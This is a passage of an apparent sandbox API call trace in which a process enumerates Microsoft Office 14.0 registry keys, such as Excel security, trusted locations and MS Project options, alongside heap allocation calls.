lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.976] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.976] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Translation") returned 0x0 [0134.976] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.976] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.976] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Research\\Translation", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.976] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.976] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.976] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.976] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.976] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.976] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="Translation") returned 0x103 [0134.977] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.977] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.977] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.977] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xe, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x0 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.977] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.977] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.977] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="FileValidation") returned 0x0 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.977] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Security\\FileValidation", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.977] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.977] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.977] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.977] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.978] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.978] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.978] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.978] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.978] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="FileValidation") returned 0x103 [0134.978] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.978] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.978] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.978] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xf, lpName=0x91287f8, cchName=0x400 | out: lpName="Toolbars") returned 0x0 [0134.978] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.978] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Toolbars", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.978] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.978] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.978] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.978] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Settings") returned 0x0 [0134.978] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.978] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.978] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Toolbars\\Settings", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.979] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.979] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.979] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.979] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.979] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.979] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Settings") returned 0x103 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.979] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.979] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x10, lpName=0x91287f8, cchName=0x400 | out: lpName="Toolbars") returned 0x103 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.979] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0134.979] RegCloseKey (hKey=0x5ac) returned 0x0 [0134.979] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x2, lpName=0x91283f0, cchName=0x400 | out: lpName="Excel") returned 0x0 [0134.979] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0134.979] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.980] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0134.980] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0134.980] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0134.980] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="File MRU") returned 0x0 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.980] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\File MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.980] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.980] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.980] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.980] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.980] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.980] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="Options") returned 0x0 [0134.980] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.980] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Options", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.981] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.981] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.981] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.981] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.981] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.981] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91287f8, cchName=0x400 | out: lpName="Place MRU") returned 0x0 [0134.981] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Place MRU", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.981] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.981] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.981] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.981] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.981] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.981] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x0 [0134.982] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.982] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.982] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="FileBlock") returned 0x0 [0134.982] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\FileBlock", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.982] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.982] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.982] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.982] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="FileValidation") returned 0x0 [0134.982] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\FileValidation", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.983] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.983] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.983] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="ProtectedView") returned 0x0 [0134.983] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.983] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.983] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.983] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x3, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Documents") returned 0x0 [0134.983] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Documents", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.983] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.984] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.984] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x4, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Locations") returned 0x0 [0134.984] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.984] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="Location0") returned 0x0 [0134.984] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations\\Location0", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.984] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.984] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.984] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="Location1") returned 0x0 [0134.984] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations\\Location1", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.985] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.985] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.985] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x2, lpName=0x9129008, cchName=0x400 | out: lpName="Location2") returned 0x0 [0134.985] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations\\Location2", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.985] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.985] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.985] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x3, lpName=0x9129008, cchName=0x400 | out: lpName="Location3") returned 0x0 [0134.985] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations\\Location3", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.986] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.986] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.986] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x4, lpName=0x9129008, cchName=0x400 | out: lpName="Location4") returned 0x0 [0134.986] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations\\Location4", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.986] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.986] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.986] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x5, lpName=0x9129008, cchName=0x400 | out: lpName="Location5") returned 0x0 [0134.986] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Excel\\Security\\Trusted Locations\\Location5", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.986] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.986] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.987] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x6, lpName=0x9129008, cchName=0x400 | out: lpName="Location5") returned 0x103 [0134.987] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.987] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x5, lpName=0x9128c00, cchName=0x400 | out: lpName="Trusted Locations") returned 0x103 [0134.987] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.987] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x4, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x103 [0134.987] RegCloseKey (hKey=0x5ac) returned 0x0 [0134.987] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x3, lpName=0x91283f0, cchName=0x400 | out: lpName="MS Project") returned 0x0 [0134.987] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0134.987] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="Options") returned 0x0 [0134.987] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.988] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Calculation") returned 0x0 [0134.988] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\Calculation", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.988] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.988] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.988] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Calendar") returned 0x0 [0134.988] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\Calendar", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.988] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.988] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.989] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="Edit") returned 0x0 [0134.989] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\Edit", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.989] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.989] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.989] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x3, lpName=0x9128c00, cchName=0x400 | out: lpName="General") returned 0x0 [0134.989] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\General", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.989] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.989] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.989] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x4, lpName=0x9128c00, cchName=0x400 | out: lpName="Leveling") returned 0x0 [0134.990] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\Leveling", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.990] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.990] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.990] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x5, lpName=0x9128c00, cchName=0x400 | out: lpName="PlanningWizard") returned 0x0 [0134.990] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\PlanningWizard", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.990] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.990] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.990] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x6, lpName=0x9128c00, cchName=0x400 | out: lpName="View") returned 0x0 [0134.990] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\View", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.991] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x0 [0134.991] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Options\\View\\1033", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.991] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.991] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.991] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x103 [0134.991] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.991] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x7, lpName=0x9128c00, cchName=0x400 | out: lpName="View") returned 0x103 [0134.991] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.991] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91287f8, cchName=0x400 | out: lpName="Profiles") returned 0x0 [0134.991] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Profiles", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.992] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.992] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.992] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91287f8, cchName=0x400 | out: lpName="Recent File List") returned 0x0 [0134.992] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Recent File List", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.992] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.992] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.992] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91287f8, cchName=0x400 | out: lpName="Security") returned 0x0 [0134.992] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Security", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.993] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.993] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.993] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x4, lpName=0x91287f8, cchName=0x400 | out: lpName="Settings") returned 0x0 [0134.993] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\MS Project\\Settings", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.993] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.993] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.993] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x5, lpName=0x91287f8, cchName=0x400 | out: lpName="Settings") returned 